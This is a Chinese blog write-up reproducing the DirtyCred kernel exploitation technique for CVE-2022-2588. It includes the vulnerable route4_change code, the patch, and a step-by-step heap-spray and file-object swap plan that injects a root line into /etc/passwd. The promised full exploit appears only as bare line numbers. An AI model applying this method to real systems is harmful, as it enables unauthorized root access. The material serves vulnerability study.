0%

Kernel 现实漏洞复现:Dirty Cred

Dirty Cred 漏洞成因

DirtyCred,一种新的通用漏洞利用方法,不用依赖 Linux 的 pipeline 机制,只需利用堆内存破坏类型的漏洞

攻击适用版本:

  • Linux Kernel版本 >= 2.6.12
  • Linux Kernel版本 <= 5.19.1

在 Linux 内核的 net/sched/cls_route.c 实现的 route4_change 中发现了一个漏洞,该漏洞源于释放后重用,本地攻击者利用该漏洞会导致系统崩溃,可能会造成本地特权升级问题

由于将 route4_filter 对象从链表中删除和释放时的检查条件不一致,导致该对象被释放后仍存于链表中,后面可以触发 Double-Free

前置知识 - 内核凭证 Credential

Kernel 凭证是 kernel 文档中定义的 kernel 中携带特权信息的特征,表示权限和对应的能力,主要分为:

  • task 凭证(struct cred
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* subjective LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct group_info *group_info; /* supplementary groups for euid/fsgid */
/* RCU deletion */
union {
int non_rcu; /* Can we skip RCU deletion? */
struct rcu_head rcu; /* RCU deletion hook */
};
} __randomize_layout;
  • open file 凭证(struct file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
struct file {
union {
struct llist_node fu_llist;
struct rcu_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode; /* cached value */
const struct file_operations *f_op;

/*
* Protects f_ep_links, f_flags.
* Must not be taken from IRQ context.
*/
spinlock_t f_lock;
enum rw_hint f_write_hint;
atomic_long_t f_count;
unsigned int f_flags;
fmode_t f_mode;
struct mutex f_pos_lock;
loff_t f_pos;
struct fown_struct f_owner;
const struct cred *f_cred;
struct file_ra_state f_ra;

u64 f_version;
#ifdef CONFIG_SECURITY
void *f_security;
#endif
/* needed for tty driver, and maybe others */
void *private_data;

#ifdef CONFIG_EPOLL
/* Used by fs/eventpoll.c to link all the hooks to this file */
struct list_head f_ep_links;
struct list_head f_tfile_llink;
#endif /* #ifdef CONFIG_EPOLL */
struct address_space *f_mapping;
errseq_t f_wb_err;
errseq_t f_sb_err; /* for syncfs */
} __randomize_layout
__attribute__((aligned(4))); /* lest something weird decides that 2 is OK */

struct file_handle {
__u32 handle_bytes;
int handle_type;
/* file identifier */
unsigned char f_handle[];
};

前置知识 - Slab 的两种内存缓存

众所周知,Linux 内核主要使用 slab 分配器来进行内存分配,slab 分配器中主要维护了两种内存缓存(即可以理解成两套作用不同的内存分配方式):

  • dedicated cache:这里的内存是用于分配给内核中的常用对象,在该缓存中被分配的结构体将始终保持初始化状态,以便于提高分配速度
  • generic cache:通用缓存,大多数情况下其内存块的大小与 2 的幂次方对齐

这类 credfile 结构体等 credential 对象都是在 dedicated cache 中分配,而大多数内存漏洞发生的地方都是在 generic cache

使用 sudo cat /proc/slabinfo 可以查看 slab 分配器的具体信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
slabinfo - version: 2.1
# name <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab>
isofs_inode_cache 94 94 688 47 8 : tunables 0 0 0 : sl0
nf_conntrack 400 400 320 25 2 : tunables 0 0 0 : sl0
au_vdir 0 0 128 32 1 : tunables 0 0 0 : sl0
au_finfo 0 0 192 42 2 : tunables 0 0 0 : sl0
au_icntnr 0 0 832 39 8 : tunables 0 0 0 : sl0
au_dinfo 0 0 192 42 2 : tunables 0 0 0 : sl0
ovl_inode 90 90 720 45 8 : tunables 0 0 0 : sl0
AF_VSOCK 375 375 1280 25 8 : tunables 0 0 0 : sl0
ext4_groupinfo_4k 672 672 192 42 2 : tunables 0 0 0 : sl0
fsverity_info 0 0 256 32 2 : tunables 0 0 0 : sl0
fscrypt_info 0 0 136 30 1 : tunables 0 0 0 : sl0
MPTCPv6 0 0 2048 16 8 : tunables 0 0 0 : sl0
ip6-frags 0 0 184 44 2 : tunables 0 0 0 : sl0
PINGv6 0 0 1216 26 8 : tunables 0 0 0 : sl0
RAWv6 1352 1352 1216 26 8 : tunables 0 0 0 : sl0
UDPv6 360 360 1344 24 8 : tunables 0 0 0 : sl0
tw_sock_TCPv6 0 0 248 33 2 : tunables 0 0 0 : sl0
request_sock_TCPv6 0 0 304 26 2 : tunables 0 0 0 : s0
TCPv6 130 130 2432 13 8 : tunables 0 0 0 : sl0
kcopyd_job 0 0 3240 10 8 : tunables 0 0 0 : sl0
dm_uevent 0 0 2888 11 8 : tunables 0 0 0 : sl0
scsi_sense_cache 1504 1504 128 32 1 : tunables 0 0 0 : sl0
mqueue_inode_cache 34 34 960 34 8 : tunables 0 0 0 : s0
fuse_request 338 338 152 26 1 : tunables 0 0 0 : sl0
fuse_inode 195 195 832 39 8 : tunables 0 0 0 : sl0
ecryptfs_inode_cache 0 0 1024 32 8 : tunables 0 0 0 :0
ecryptfs_file_cache 0 0 16 256 1 : tunables 0 0 0 : 0
ecryptfs_auth_tok_list_item 0 0 832 39 8 : tunables 0 00
fat_inode_cache 42 42 776 42 8 : tunables 0 0 0 : sl0
fat_cache 0 0 40 102 1 : tunables 0 0 0 : sl0
squashfs_inode_cache 552 552 704 46 8 : tunables 0 0 0 :0
jbd2_journal_head 2312 2380 120 34 1 : tunables 0 0 0 : sl0
jbd2_revoke_table_s 256 256 16 256 1 : tunables 0 0 0 : 0
ext4_fc_dentry_update 0 0 80 51 1 : tunables 0 0 0 0
ext4_inode_cache 49680 49680 1176 27 8 : tunables 0 0 0 : sl0
ext4_allocation_context 448 448 144 28 1 : tunables 0 0 0
ext4_io_end 1152 1152 64 64 1 : tunables 0 0 0 : sl0
ext4_pending_reservation 2048 2048 32 128 1 : tunables 0 0 0
ext4_extent_status 44133 44268 40 102 1 : tunables 0 0 0 : s0
mbcache 4088 4088 56 73 1 : tunables 0 0 0 : sl0
kioctx 0 0 576 28 4 : tunables 0 0 0 : sl0
userfaultfd_ctx_cache 0 0 192 42 2 : tunables 0 0 0 0
dnotify_struct 0 0 32 128 1 : tunables 0 0 0 : sl0
pid_namespace 90 90 136 30 1 : tunables 0 0 0 : sl0
UNIX 1140 1140 1088 30 8 : tunables 0 0 0 : sl0
ip4-frags 0 0 200 40 2 : tunables 0 0 0 : sl0
MPTCP 0 0 1920 17 8 : tunables 0 0 0 : sl0
request_sock_subflow 0 0 376 43 4 : tunables 0 0 0 :0
xfrm_dst_cache 0 0 320 25 2 : tunables 0 0 0 : sl0
xfrm_state 0 0 768 42 8 : tunables 0 0 0 : sl0
ip_fib_trie 935 935 48 85 1 : tunables 0 0 0 : sl0
ip_fib_alias 876 876 56 73 1 : tunables 0 0 0 : sl0
PING 0 0 1024 32 8 : tunables 0 0 0 : sl0
RAW 1728 1728 1024 32 8 : tunables 0 0 0 : sl0
tw_sock_TCP 297 297 248 33 2 : tunables 0 0 0 : sl0
request_sock_TCP 286 286 304 26 2 : tunables 0 0 0 : sl0
TCP 224 224 2240 14 8 : tunables 0 0 0 : sl0
hugetlbfs_inode_cache 168 168 664 24 4 : tunables 0 0 0 0
dquot 512 512 256 32 2 : tunables 0 0 0 : sl0
ep_head 4096 4096 16 256 1 : tunables 0 0 0 : sl0
dax_cache 39 39 832 39 8 : tunables 0 0 0 : sl0
bio_crypt_ctx 306 306 40 102 1 : tunables 0 0 0 : sl0
request_queue 105 105 2128 15 8 : tunables 0 0 0 : sl0
biovec-max 304 320 4096 8 8 : tunables 0 0 0 : sl0
biovec-128 256 256 2048 16 8 : tunables 0 0 0 : sl0
biovec-64 512 512 1024 32 8 : tunables 0 0 0 : sl0
khugepaged_mm_slot 216 216 112 36 1 : tunables 0 0 0 : s0
user_namespace 156 156 624 26 4 : tunables 0 0 0 : sl0
dmaengine-unmap-256 15 15 2112 15 8 : tunables 0 0 0 : 0
dmaengine-unmap-128 30 30 1088 30 8 : tunables 0 0 0 : 0
sock_inode_cache 4212 4212 832 39 8 : tunables 0 0 0 : sl0
skbuff_ext_cache 672 672 192 42 2 : tunables 0 0 0 : sl0
skbuff_fclone_cache 512 512 512 32 4 : tunables 0 0 0 : 0
skbuff_head_cache 2560 2688 256 32 2 : tunables 0 0 0 : sl0
file_lock_cache 592 592 216 37 2 : tunables 0 0 0 : sl0
file_lock_ctx 1168 1168 56 73 1 : tunables 0 0 0 : sl0
fsnotify_mark_connector 2048 2048 32 128 1 : tunables 0 0 0
buffer_head 192504 192504 104 39 1 : tunables 0 0 0 : sl0
x86_lbr 0 0 800 40 8 : tunables 0 0 0 : sl0
taskstats 736 736 352 46 4 : tunables 0 0 0 : sl0
proc_dir_entry 1638 1638 192 42 2 : tunables 0 0 0 : sl0
pde_opener 1632 1632 40 102 1 : tunables 0 0 0 : sl0
proc_inode_cache 12098 12098 712 46 8 : tunables 0 0 0 : sl0
seq_file 544 544 120 34 1 : tunables 0 0 0 : sl0
sigqueue 1071 1071 80 51 1 : tunables 0 0 0 : sl0
bdev_cache 160 160 1600 20 8 : tunables 0 0 0 : sl0
shmem_inode_cache 2408 2408 760 43 8 : tunables 0 0 0 : sl0
kernfs_node_cache 71552 71552 128 32 1 : tunables 0 0 0 : sl0
mnt_cache 2900 2900 320 25 2 : tunables 0 0 0 : sl0
filp 11820 12096 256 32 2 : tunables 0 0 0 : sl0
inode_cache 44725 44725 640 25 4 : tunables 0 0 0 : sl0
dentry 149394 149394 192 42 2 : tunables 0 0 0 : sl0
names_cache 208 208 4096 8 8 : tunables 0 0 0 : sl0
net_namespace 49 49 4352 7 8 : tunables 0 0 0 : sl0
iint_cache 0 0 120 34 1 : tunables 0 0 0 : sl0
lsm_file_cache 123420 123420 24 170 1 : tunables 0 0 0 : sl0
uts_namespace 222 222 432 37 4 : tunables 0 0 0 : sl0
nsproxy 728 728 72 56 1 : tunables 0 0 0 : sl0
vm_area_struct 52371 53079 208 39 2 : tunables 0 0 0 : sl0
mm_struct 780 780 1088 30 8 : tunables 0 0 0 : sl0
files_cache 920 920 704 46 8 : tunables 0 0 0 : sl0
signal_cache 2027 2044 1152 28 8 : tunables 0 0 0 : sl0
sighand_cache 1245 1245 2112 15 8 : tunables 0 0 0 : sl0
task_struct 1130 1176 8064 4 8 : tunables 0 0 0 : sl0
cred_jar 6258 6258 192 42 2 : tunables 0 0 0 : sl0
anon_vma_chain 28659 29184 64 64 1 : tunables 0 0 0 : sl0
anon_vma 19422 19422 104 39 1 : tunables 0 0 0 : sl0
pid 3360 3360 128 32 1 : tunables 0 0 0 : sl0
Acpi-Operand 11928 11928 72 56 1 : tunables 0 0 0 : sl0
Acpi-ParseExt 429 429 104 39 1 : tunables 0 0 0 : sl0
Acpi-State 1326 1326 80 51 1 : tunables 0 0 0 : sl0
numa_policy 155 155 264 31 2 : tunables 0 0 0 : sl0
perf_event 27 27 1192 27 8 : tunables 0 0 0 : sl0
trace_event_file 3496 3496 88 46 1 : tunables 0 0 0 : sl0
ftrace_event_field 13090 13090 48 85 1 : tunables 0 0 0 : s0
pool_workqueue 3392 3392 256 32 2 : tunables 0 0 0 : sl0
radix_tree_node 23380 23380 584 28 4 : tunables 0 0 0 : sl0
task_group 425 425 640 25 4 : tunables 0 0 0 : sl0
vmap_area 12359 26624 64 64 1 : tunables 0 0 0 : sl0
dma-kmalloc-8k 0 0 8192 4 8 : tunables 0 0 0 : sl0
dma-kmalloc-4k 0 0 4096 8 8 : tunables 0 0 0 : sl0
dma-kmalloc-2k 0 0 2048 16 8 : tunables 0 0 0 : sl0
dma-kmalloc-1k 0 0 1024 32 8 : tunables 0 0 0 : sl0
dma-kmalloc-512 0 0 512 32 4 : tunables 0 0 0 : sl0
dma-kmalloc-256 0 0 256 32 2 : tunables 0 0 0 : sl0
dma-kmalloc-128 0 0 128 32 1 : tunables 0 0 0 : sl0
dma-kmalloc-64 0 0 64 64 1 : tunables 0 0 0 : sl0
dma-kmalloc-32 0 0 32 128 1 : tunables 0 0 0 : sl0
dma-kmalloc-16 0 0 16 256 1 : tunables 0 0 0 : sl0
dma-kmalloc-8 0 0 8 512 1 : tunables 0 0 0 : sl0
dma-kmalloc-192 0 0 192 42 2 : tunables 0 0 0 : sl0
dma-kmalloc-96 0 0 96 42 1 : tunables 0 0 0 : sl0
kmalloc-rcl-8k 0 0 8192 4 8 : tunables 0 0 0 : sl0
kmalloc-rcl-4k 0 0 4096 8 8 : tunables 0 0 0 : sl0
kmalloc-rcl-2k 0 0 2048 16 8 : tunables 0 0 0 : sl0
kmalloc-rcl-1k 0 0 1024 32 8 : tunables 0 0 0 : sl0
kmalloc-rcl-512 0 0 512 32 4 : tunables 0 0 0 : sl0
kmalloc-rcl-256 0 0 256 32 2 : tunables 0 0 0 : sl0
kmalloc-rcl-192 0 0 192 42 2 : tunables 0 0 0 : sl0
kmalloc-rcl-128 800 800 128 32 1 : tunables 0 0 0 : sl0
kmalloc-rcl-96 1386 1386 96 42 1 : tunables 0 0 0 : sl0
kmalloc-rcl-64 5824 5824 64 64 1 : tunables 0 0 0 : sl0
kmalloc-rcl-32 0 0 32 128 1 : tunables 0 0 0 : sl0
kmalloc-rcl-16 0 0 16 256 1 : tunables 0 0 0 : sl0
kmalloc-rcl-8 0 0 8 512 1 : tunables 0 0 0 : sl0
kmalloc-cg-8k 60 60 8192 4 8 : tunables 0 0 0 : sl0
kmalloc-cg-4k 192 216 4096 8 8 : tunables 0 0 0 : sl0
kmalloc-cg-2k 272 272 2048 16 8 : tunables 0 0 0 : sl0
kmalloc-cg-1k 1113 1248 1024 32 8 : tunables 0 0 0 : sl0
kmalloc-cg-512 2498 2688 512 32 4 : tunables 0 0 0 : sl0
kmalloc-cg-256 512 512 256 32 2 : tunables 0 0 0 : sl0
kmalloc-cg-192 672 672 192 42 2 : tunables 0 0 0 : sl0
kmalloc-cg-128 640 640 128 32 1 : tunables 0 0 0 : sl0
kmalloc-cg-96 672 672 96 42 1 : tunables 0 0 0 : sl0
kmalloc-cg-64 2112 2112 64 64 1 : tunables 0 0 0 : sl0
kmalloc-cg-32 2048 2048 32 128 1 : tunables 0 0 0 : sl0
kmalloc-cg-16 4608 4608 16 256 1 : tunables 0 0 0 : sl0
kmalloc-cg-8 8192 8192 8 512 1 : tunables 0 0 0 : sl0
kmalloc-8k 244 244 8192 4 8 : tunables 0 0 0 : sl0
kmalloc-4k 1860 1872 4096 8 8 : tunables 0 0 0 : sl0
kmalloc-2k 2384 2384 2048 16 8 : tunables 0 0 0 : sl0
kmalloc-1k 2968 3008 1024 32 8 : tunables 0 0 0 : sl0
kmalloc-512 52767 52768 512 32 4 : tunables 0 0 0 : sl0
kmalloc-256 8879 8960 256 32 2 : tunables 0 0 0 : sl0
kmalloc-192 3486 3486 192 42 2 : tunables 0 0 0 : sl0
kmalloc-128 3419 3424 128 32 1 : tunables 0 0 0 : sl0
kmalloc-96 5482 5754 96 42 1 : tunables 0 0 0 : sl0
kmalloc-64 18368 18368 64 64 1 : tunables 0 0 0 : sl0
kmalloc-32 33152 33152 32 128 1 : tunables 0 0 0 : sl0
kmalloc-16 16640 16640 16 256 1 : tunables 0 0 0 : sl0
kmalloc-8 15872 15872 8 512 1 : tunables 0 0 0 : sl0
kmem_cache_node 576 576 64 64 1 : tunables 0 0 0 : sl0
kmem_cache 384 384 256 32 2 : tunables 0 0 0 : sl0
  • generic cache:在名称中带有 kmalloc
  • dedicated cache:拥有特殊的名字

Dirty Cred 漏洞利用

大致步骤:

  • 释放存在漏洞的非特权凭据
  • 在释放的内存插槽中分配特权凭据
  • 以特权用户身份操作

具体步骤:(本例是采用 file 对象完成利用,也可以采用 cred 对象)

  • 打开可写的文件 /tmp/x,就会分配可写的 file 对象,在通过写许可检查之后后,进行实际写操作之前暂停
  • 利用漏洞释放该 file 对象
  • 打开只读文件 /etc/passwd,就会分配新的 file 对象,占据旧的 file 对象,继续写入就能往只读文件写入内容(例如写入 hacker:x:0:0:root:/:/bin/sh 就能提权)

CVE-2022-2588 漏洞点:

  • route4_filter 对象从链表中删除和释放时的检查条件不一致
  • 导致该对象被释放后仍存于链表中

安装 Kernel:

1
2
3
4
5
wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.19.1.tar.xz
tar -xvf linux-5.19.1.tar.xz
make menuconfig
make x86_64_defconfig
make bzImage -j32

编译选项:

  • CONFIG_BINFMT_MISC=y (否则启动VM时报错)
  • CONFIG_USER_NS=y (触发漏洞需要 User Namespace)
  • CONFIG_NET_CLS_ROUTE4=y (漏洞函数所在的模块)
  • CONFIG_DUMMY=y CONFIG_NET_SCH_QFQ=y (breezeO_o 提供的两个编译选项,触发 poc 需要用到)
  • CONFIG_NET_CLS_ACT=y / CONFIG_NET_CLS_BASIC=y (默认已开启)
  • CONFIG_NET_SCH_SFQ=y (exp 中触发漏洞需用到 sfq 随机公平队列)
  • CONFIG_NET_EMATCH_META=y (exp 中堆喷对象时需要用到)

Dirty Cred 所面对的挑战:

  1. 如何将内存破坏漏洞,转换为能够置换 file object 的原语
  2. 如何延长文件的 权限检查-数据写入 的竞争窗口
  3. 如何创建高权限的 file object,来占据先前被释放的低权限 file object 内存空洞

对应的解决措施:

  1. 置换 file object
    • Out Of Bound Write:尝试越界写入下一个结构体的凭证字段,将其替换为高权限的凭证(例如:request_key_auth->cred
    • Use After Free:使用高权限的凭证来“占据”低权限的凭证
    • Double Free:最终可以达到两个指针共同指向一个凭证的效果
  2. 延长竞争窗口:
    • Userfaultfd:在多线程程序中,userfaultfd 允许一个线程管理其他线程所产生的 Page Fault 事件,当某个线程触发了 Page Fault,该线程将立即睡眠,而其他线程则可以通过 userfaultfd 来读取出这个 Page Fault 事件,并进行处理
    • FUSE:一个用户层文件系统框架,允许用户实现自己的文件系统,用户可以在该框架中注册 handler,来指定应对文件操作请求(可以在实际操作文件之前,执行 handler 暂停内核执行,尽可能地延长窗口)
    • File Lock:使用锁定暂停内核执行
  3. 分配特权对象:
    • 大量执行 Set-UID 程序(例如 sudo),或者频繁创建特权级守护进程(例如 sshd),从而创建 privilege cred 结构体
    • 使用 ReadOnly 方式来打开诸如 /etc/passwd 等特权文件
    • 当内核创建新的 kernel thread 时,当前 kernel thread 将会被复制,于此同时其 privileged cred 结构体也会被拷贝一份

接下来看一看关键的代码:

  • route4_filter 对象:(大小为“144”,属于 kmalloc-192
1
2
3
4
5
6
7
8
9
10
11
12
struct route4_filter {
struct route4_filter __rcu *next;
u32 id;
int iif;

struct tcf_result res;
struct tcf_exts exts;
u32 handle;
struct route4_bucket *bkt;
struct tcf_proto *tp;
struct rcu_work rwork;
};
  • tcf_exts 对象的 tc_action 条目:(包含32个 tc_action 对象指针,属于 kmalloc-256
1
2
3
4
5
6
7
8
9
10
11
12
13
struct tcf_exts {
#ifdef CONFIG_NET_CLS_ACT
__u32 type; /* for backward compat(TCA_OLD_COMPAT) */
int nr_actions;
struct tc_action **actions;
struct net *net;
#endif
/* Map to export classifier specific extension TLV types to the
* generic extensions API. Unsupported extensions must be set to 0.
*/
int action;
int police;
};
  • 有漏洞的代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
static int route4_change(struct net *net, struct sk_buff *in_skb,
struct tcf_proto *tp, unsigned long base, u32 handle,
struct nlattr **tca, void **arg, bool ovr,
bool rtnl_held, struct netlink_ext_ack *extack)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_filter __rcu **fp;
struct route4_filter *fold, *f1, *pfp, *f = NULL;
struct route4_bucket *b;
struct nlattr *opt = tca[TCA_OPTIONS];
struct nlattr *tb[TCA_ROUTE4_MAX + 1];
unsigned int h, th;
int err;
bool new = true;

if (opt == NULL)
return handle ? -EINVAL : 0;

err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
route4_policy, NULL);
if (err < 0)
return err;

fold = *arg; /* 现有的route4_filter对象 */
if (fold && handle && fold->handle != handle)
return -EINVAL;

err = -ENOBUFS;
f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL); /* 分配新的route4_filter对象 */
if (!f)
goto errout;

err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE); /* 进行初始化,为route4_filter->exts.action分配256字节的空间 */
if (err < 0)
goto errout;

if (fold) { /* 把旧的route4_filter对象中的数据填入新的route4_filter对象 */
f->id = fold->id;
f->iif = fold->iif;
f->res = fold->res;
f->handle = fold->handle;

f->tp = fold->tp;
f->bkt = fold->bkt;
new = false;
}

err = route4_set_parms(net, tp, base, f, handle, head, tb,
tca[TCA_RATE], new, ovr, extack); /* 初始化new filter */
if (err < 0)
goto errout;

/* 将new filter插入到list */
h = from_hash(f->handle >> 16);
fp = &f->bkt->ht[h];
for (pfp = rtnl_dereference(*fp);
(f1 = rtnl_dereference(*fp)) != NULL;
fp = &f1->next)
if (f->handle < f1->handle)
break;

tcf_block_netif_keep_dst(tp->chain->block);
rcu_assign_pointer(f->next, f1);
rcu_assign_pointer(*fp, f);

/* 若存在old filter,old handle不为"0",old new handle不同,则从list中移除 */
if (fold && fold->handle && f->handle != fold->handle) {
th = to_hash(fold->handle);
h = from_hash(fold->handle >> 16);
b = rtnl_dereference(head->table[th]);
if (b) {
fp = &b->ht[h]; /* ht存放的是route4_filter列表 */
for (pfp = rtnl_dereference(*fp); pfp;
fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
if (pfp == fold) {
rcu_assign_pointer(*fp, fold->next); /* 从链表中删除 */
break;
}
}
}
}

route4_reset_fastmap(head);
*arg = f;
if (fold) { /* 若存在old filter,释放old filter */
tcf_unbind_filter(tp, &fold->res);
tcf_exts_get_net(&fold->exts);
tcf_queue_work(&fold->rwork, route4_delete_filter_work); /* 启动内核任务,调用route4_delete_filter_work释放old filter */
}
return 0;

errout:
if (f)
tcf_exts_destroy(&f->exts);
kfree(f);
return err;
}
  • 使用 handle 作为 ID 来区分不同的 route4_filter
  • 如果存在某个 handle 之前已被初始化过(fold 变量非空),就会移除旧的 filter,添加新的 filter
  • 否则直接添加新的 filter

这里可以发现,将 route4_filter 对象从链表中删除和释放时的检查条件不一致:

  • 从链表中删除的条件:
    • 存在 old filter
    • old handle 不为 “0”
    • old new handle 不同
  • 从链表中释放的条件:
    • 存在 old filter

如果 old handle == 0,则不会在链表中删除但是会被释放,这就导致了一个 UAF

漏洞利用的思路为:

cross-cache:我们将释放某个 kmalloc-256 cache page,将该页归还给页管理器,然后分配 file 结构来复用该页(filp cache

  • 分配一堆 kmalloc-256 堆块,包含漏洞对象
  • 利用漏洞第1次释放漏洞对象,并释放一堆 kmalloc-256,以归还漏洞对象所在的页
  • 分配大量低权限 file 对象来占据漏洞对象(cross-cache attack)
  • 利用漏洞第2次释放漏洞对象(低权限 file 对象被释放)
  • 堆喷高权限 file 对象来替换低权限 file 对象
  • 利用 UAF 控制高权限 file 对象

补丁:

1
2
3
4
5
6
7
8
9
10
11
12
13
diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866e..3f935cbbaff66 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
rcu_assign_pointer(f->next, f1);
rcu_assign_pointer(*fp, f);

- if (fold && fold->handle && f->handle != fold->handle) {
+ if (fold) {
th = to_hash(fold->handle);
h = from_hash(fold->handle >> 16);
b = rtnl_dereference(head->table[th]);

Dirty Cred 漏洞复现

进程1 进程2
0. 绑定到 CPU 0 上运行,设置子进程内存、工作目录、Namespace,启动进程2
1. 去碎片化,打开10000个文件,消耗 filp cache,为 cross-cache 作准备
2. 喷射 (middle+3)*32 kmalloc-192 & kmalloc-256(和漏洞对象位于同一cache,便于进行 cross-cache 被 file 对象复用)
3. 分配1个 route4_filter 漏洞对象,还有1个kmalloc-256 的漏洞对象
4. 再喷射 (end-middle-2)*32 kmalloc-192 & kmalloc-256
5. 释放 (end-24)*32 kmalloc-192 & kmalloc-256
6. 第1次释放漏洞对象 kmalloc-192 & kmalloc-256
7. 释放 (end-middle+1) kmalloc-192 & kmalloc-256(避免连续释放同一对象,触发内核 double-free 的检测)
8. 喷射 4000 个低权限 file 对象(通过打开 exp_dir/data 文件)
9. 第2次释放漏洞对象 kmalloc-192 & kmalloc-256
10. 喷射 5000 个低权限 file 对象,采用 kcmp 调用检查是否和前 4000 个 file 重合,重合的两个 file 记为 overlap_a / overlap_b
11. 发起3个利用线程,线程1写入大量数据来占用文件锁,线程2往 overlap_a 写入恶意数据
12. 线程3关闭 overlap_a / overlap_b,喷射 4096*2 个高权限 file 对象(通过打开 /etc/passwd 文件),未区分CPU
13. 最后检查 /etc/passwd 文件是否被写入恶意数据

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
